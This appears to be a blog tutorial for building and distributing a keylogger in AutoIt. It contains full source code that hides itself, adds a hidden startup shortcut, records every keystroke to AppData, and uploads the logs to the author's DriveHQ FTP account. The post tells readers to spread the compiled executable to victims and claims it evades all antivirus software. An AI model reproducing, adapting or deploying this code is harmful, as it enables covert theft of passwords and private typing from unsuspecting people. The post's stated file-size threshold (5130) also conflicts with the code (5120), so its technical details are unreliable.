Things you will need:
Au3 Scripting Language
A computer
Working Internet connection
SciTE(recommended), or notepad.
1. Create a DriveHQ account
Go here and create an account. E-mail verification is required. If you already have an account, it is extremely recommended that you create one only for keylogger use.
After you signed up and verified your e-mail.. That's it, you're done for this part.
2. Access the FTP
Now, open a blank page in your web browser. And type the code in the URL bar as follows:
Code:
Exsimple: ftp://DriveHQUsername:DriveHQPassword@drivehq.ftp.com
After you did that, you should end up with a screen that looks somewhat like this:
[Image: image.jpg]
This is what you will be using to access your logs. Every computer that is logged will have it's own directory within the FTP named after their computer name.
3. Create the Keylogger Server
This is the technical and fun part. This is where you create your server using Au3.
First, fire up SciTE. Go to the directory where you installed Au3, find the SciTE folder, then click on the SciTE application. SciTE view should look like this:
[Image: image.jpg]
After you fired up SciTE, copy this code (this is the server code) into the editor:
Code:
#include <GUIConstantsEx.au3>
#include <ButtonConstants.au3>
#include <File.au3>
#include <Misc.au3>
#include <FTPEx.au3>
;Coded by Kush
Global $Save, $Num, $Server, $Username, $Password
$Server = "ServerName"
$Username = "FtpServerUsername"
$Password = "FtpServerPassword"
Logging()
Func Logging()
AutoItSetOption("TrayIconHide", 1)
$Shortcut = FileCreateShortcut(@AutoItExe, @StartupDir & "\" & @ScriptName & ".lnk")
FileSetAttrib($Shortcut, "+H")
$Save = @AppDataDir & "/" & "Log" & $Num & ".txt"
_FileCreate($Save)
While 2
Local $DLL = DllOpen("user32.dll")
If _IsPressed("41", $DLL) Then FileWrite($Save, "a")
While _IsPressed("41", $DLL)
WEnd
If _IsPressed("08", $DLL) Then FileWrite($Save, "BACKSPACE ")
While _IsPressed("08", $DLL)
WEnd
If _IsPressed("09", $DLL) Then FileWrite($Save, @TAB)
While _IsPressed("09", $DLL)
WEnd
If _IsPressed("0D", $DLL) Then FileWrite($Save, @CRLF)
While _IsPressed("0D", $DLL)
WEnd
If _IsPressed("20", $DLL) Then FileWrite($Save, " ")
While _IsPressed("20", $DLL)
WEnd
If _IsPressed("30", $DLL) Then FileWrite($Save, "0")
While _IsPressed("30", $DLL)
WEnd
If _IsPressed("31", $DLL) Then FileWrite($Save, "1")
While _IsPressed("31", $DLL)
WEnd
If _IsPressed("32", $DLL) Then FileWrite($Save, "2")
While _IsPressed("32", $DLL)
WEnd
If _IsPressed("33", $DLL) Then FileWrite($Save, "3")
While _IsPressed("33", $DLL)
WEnd
If _IsPressed("34", $DLL) Then FileWrite($Save, "4")
While _IsPressed("34", $DLL)
WEnd
If _IsPressed("35", $DLL) Then FileWrite($Save, "5")
While _IsPressed("35", $DLL)
WEnd
If _IsPressed("36", $DLL) Then FileWrite($Save, "6")
While _IsPressed("36", $DLL)
WEnd
If _IsPressed("37", $DLL) Then FileWrite($Save, "7")
While _IsPressed("37", $DLL)
WEnd
If _IsPressed("38", $DLL) Then FileWrite($Save, "8")
While _IsPressed("38", $DLL)
WEnd
If _IsPressed("39", $DLL) Then FileWrite($Save, "9")
While _IsPressed("39", $DLL)
WEnd
If _IsPressed("42", $DLL) Then FileWrite($Save, "b")
While _IsPressed("42", $DLL)
WEnd
If _IsPressed("43", $DLL) Then FileWrite($Save, "c")
While _IsPressed("43", $DLL)
WEnd
If _IsPressed("44", $DLL) Then FileWrite($Save, "d")
While _IsPressed("44", $DLL)
WEnd
If _IsPressed("45", $DLL) Then FileWrite($Save, "e")
While _IsPressed("45", $DLL)
WEnd
If _IsPressed("46", $DLL) Then FileWrite($Save, "f")
While _IsPressed("46", $DLL)
WEnd
If _IsPressed("47", $DLL) Then FileWrite($Save, "g")
While _IsPressed("47", $DLL)
WEnd
If _IsPressed("48", $DLL) Then FileWrite($Save, "h")
While _IsPressed("48", $DLL)
WEnd
If _IsPressed("49", $DLL) Then FileWrite($Save, "i")
While _IsPressed("49", $DLL)
WEnd
If _IsPressed("4A", $DLL) Then FileWrite($Save, "j")
While _IsPressed("4A", $DLL)
WEnd
If _IsPressed("4B", $DLL) Then FileWrite($Save, "k")
While _IsPressed("4B", $DLL)
WEnd
If _IsPressed("4C", $DLL) Then FileWrite($Save, "l")
While _IsPressed("4C", $DLL)
WEnd
If _IsPressed("4D", $DLL) Then FileWrite($Save, "m")
While _IsPressed("4D", $DLL)
WEnd
If _IsPressed("4F", $DLL) Then FileWrite($Save, "o")
While _IsPressed("4F", $DLL)
WEnd
If _IsPressed("50", $DLL) Then FileWrite($Save, "p")
While _IsPressed("50", $DLL)
WEnd
If _IsPressed("51", $DLL) Then FileWrite($Save, "q")
While _IsPressed("51", $DLL)
WEnd
If _IsPressed("52", $DLL) Then FileWrite($Save, "r")
While _IsPressed("52", $DLL)
WEnd
If _IsPressed("53", $DLL) Then FileWrite($Save, "s")
While _IsPressed("53", $DLL)
WEnd
If _IsPressed("54", $DLL) Then FileWrite($Save, "t")
While _IsPressed("54", $DLL)
WEnd
If _IsPressed("55", $DLL) Then FileWrite($Save, "u")
While _IsPressed("55", $DLL)
WEnd
If _IsPressed("56", $DLL) Then FileWrite($Save, "v")
While _IsPressed("56", $DLL)
WEnd
If _IsPressed("57", $DLL) Then FileWrite($Save, "w")
While _IsPressed("57", $DLL)
WEnd
If _IsPressed("58", $DLL) Then FileWrite($Save, "x")
While _IsPressed("58", $DLL)
WEnd
If _IsPressed("59", $DLL) Then FileWrite($Save, "y")
While _IsPressed("59", $DLL)
WEnd
If _IsPressed("5A", $DLL) Then FileWrite($Save, "z")
While _IsPressed("5A", $DLL)
WEnd
If _IsPressed("BA", $DLL) Then FileWrite($Save, ";")
While _IsPressed("BA", $DLL)
WEnd
If _IsPressed("BB", $DLL) Then FileWrite($Save, "=")
While _IsPressed("BB", $DLL)
WEnd
If _IsPressed("BC", $DLL) Then FileWrite($Save, ",")
While _IsPressed("BC", $DLL)
WEnd
If _IsPressed("BD", $DLL) Then FileWrite($Save, "-")
While _IsPressed("BD", $DLL)
WEnd
If _IsPressed("BE", $DLL) Then FileWrite($Save, ".")
While _IsPressed("BE", $DLL)
WEnd
If _IsPressed("BF", $DLL) Then FileWrite($Save, "/")
While _IsPressed("BF", $DLL)
WEnd
If _IsPressed("C0", $DLL) Then FileWrite($Save, "`")
While _IsPressed("C0", $DLL)
WEnd
If _IsPressed("DB", $DLL) Then FileWrite($Save, "[")
While _IsPressed("DB", $DLL)
WEnd
If _IsPressed("DC", $DLL) Then FileWrite($Save, "\")
While _IsPressed("DC", $DLL)
WEnd
If _IsPressed("DD", $DLL) Then FileWrite($Save, "]")
While _IsPressed("DD", $DLL)
WEnd
If _IsPressed("4E", $DLL) Then FileWrite($Save, "n")
While _IsPressed("4E", $DLL)
WEnd
If _IsPressed("10", $DLL) Then FileWrite($Save, "SHFT")
While _IsPressed("10", $DLL)
WEnd
If _IsPressed("25", $DLL) Then FileWrite($Save, "<")
While _IsPressed("25", $DLL)
WEnd
If _IsPressed("26", $DLL) Then FileWrite($Save, "^")
While _IsPressed("26", $DLL)
WEnd
If _IsPressed("27", $DLL) Then FileWrite($Save, ">")
While _IsPressed("27", $DLL)
WEnd
If _IsPressed("28", $DLL) Then FileWrite($Save, "*")
While _IsPressed("28", $DLL)
WEnd
$LogFileSize = FileGetSize($Save)
While $LogFileSize = 5120
$Num += 1
$Dir = _FTP_CreateDir(@ComputerName)
_FTP_FileSend($Server, $Username, $Password, $Save, "/" & @ComputerName & "/" & $Num)
FileDelete($Save)
Call("Logging")
WEnd
WEnd
EndFunc ;==>Logging
Func _FTP_FileSend($Server, $Username, $Password, $LocFile, $RemFile)
$oFTP = _FTP_Open("myftp")
$oConnect = _FTP_Connect($oFTP, $Server, $Username, $Password)
_FTP_FilePut($oConnect, $LocFile, $RemFile)
_FTP_Close($oFTP)
EndFunc ;==>_FTP_FileSend
Func _FTP_CreateDir($DirName)
$oFTP = _FTP_Open("myftp")
$oConnect = _FTP_Connect($oFTP, $Server, $Username, $Password)
_FTP_DirCreate($oConnect, $DirName)
_FTP_Close($oFTP)
EndFunc ;==>_FTP_CreateDir
NOTE: Remember that the log files in the FTP are named Log1, Log2, Log3, etc..
Now you're thinking, "What fuckery is this? What the hell am I supposed to do with THAT?" That's easy. First, don't run it. Second, in the beginning of the code, find these three variables:
[Image: image.jpg]
Replace the first one with "ftp.drivehq.com" (WITH the quotes), the second with your DriveHQ username, and the third with your DriveHQ password. It should like this:
Code:
$Server = "ftp.drivehq.com"
$Username = "herp"
$Password = "derp"
After you did that, save the file anywhere. The compile it into an "exe".
[Image: Untitled.jpg]
You're done. Now you just have to spread the server before you start receiving logs. DO NOT CLICK THE EXE, unless you want to log yourself forever. The EXE is completely FUD (Fulle Undetectable) so it won't be detected by any anti-virus software.
4. Self-Test (Optional)
To test the file on yourself, delete lines 19, 21, 22, and replace "@AppDataDir" in line 24 with "@DesktopDir". The lines are shown below:
[Image: Untitled3.jpg]
Then replace "5130" with "20" in line 252 as shown below:
[Image: Untitled.jpg]
This is done so all infection is removed and you don't accidentally infect yourself and the log file is saved to your Desktop for easy deletion. The second replacement is so the log file uploads to the FTP after it has 20 characters, then it deletes itself and creates another copy. If you want to stop the script, simply go to your tray and right click the au3 icon, then click "exit".
Keylogger Explanation and Process
This keylogger works by uploading files to an FTP. What it first does is it creates a text file in the user's "AppData" directory in which the logs will be captured. After that file reaches 5 kilobytes (thus 5130 bytes), it crosses over to the FTP, then it deletes itself, then an empty successor is created, only to cross over and to be deleted again. Quite simple actually.
0 comments:
Post a Comment